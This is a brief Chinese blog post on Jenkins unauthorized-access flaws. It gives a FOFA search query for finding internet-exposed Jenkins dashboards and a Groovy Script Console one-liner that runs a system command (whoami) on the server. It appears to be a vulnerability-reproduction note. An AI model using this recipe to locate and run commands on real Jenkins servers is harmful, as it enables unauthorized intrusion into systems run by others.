Jenkins未授权访问漏洞

lhdbk______2024-08-08 12:59
5.Jenkins未授权访问漏洞

默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。

一、使用以下fofa语法进行产品搜索
复制代码 
port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"
二:在打开的URL中.点击 Manage Jenkins-->Scritp Console 在执行以下命令

println "whoami".execute().text

相关推荐
℡終嚸♂6803 小时前
FlowiseAI 任意文件上传 CTF Writeup
sql·web安全
这儿有一堆花4 小时前
深入解析 Video.js:现代 Web 视频播放的工程实践
前端·javascript·音视频
烤麻辣烫4 小时前
JS基础
开发语言·前端·javascript·学习
white-persist4 小时前
【vulhub shiro 漏洞复现】vulhub shiro CVE-2016-4437 Shiro反序列化漏洞复现详细分析解释
运维·服务器·网络·python·算法·安全·web安全
IT_陈寒5 小时前
Vue的响应式把我坑惨了,原来问题出在这
前端·人工智能·后端
2603_953527995 小时前
WordPress Finale Lite 插件高危漏洞检测与利用工具 (CVE-2024-30485)
前端·python·安全·web3·xss
2601_949818095 小时前
头歌答案--爬虫实战
java·前端·爬虫
猫猫不是喵喵.6 小时前
layui表单项次大数据量导入并提交
前端·javascript·layui
张小潇6 小时前
AOSP15 WMS/AMS系统开发 - 窗口层级源码分析
android·前端
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点032026 年 AI 编程助手全面对比评测:Cursor vs Copilot vs Claude Code vs GitHub Copilot Free04AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析05零成本!Ollama本地部署国产大模型全指南(支持Kimi-K2.5/GLM-5/Qwen,新手秒上手)06从零部署 Hermes Agent:一只"会成长的 AI 马"保姆级安装教程07GPT-6发布日深度解析-Symphony架构200万Token实战08从旧版到 v0.20.5:Ollama 升级避坑全流程(附命令复制即用)09从限购到畅通:GLM-5.1 Coding Plan接入攻略10基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南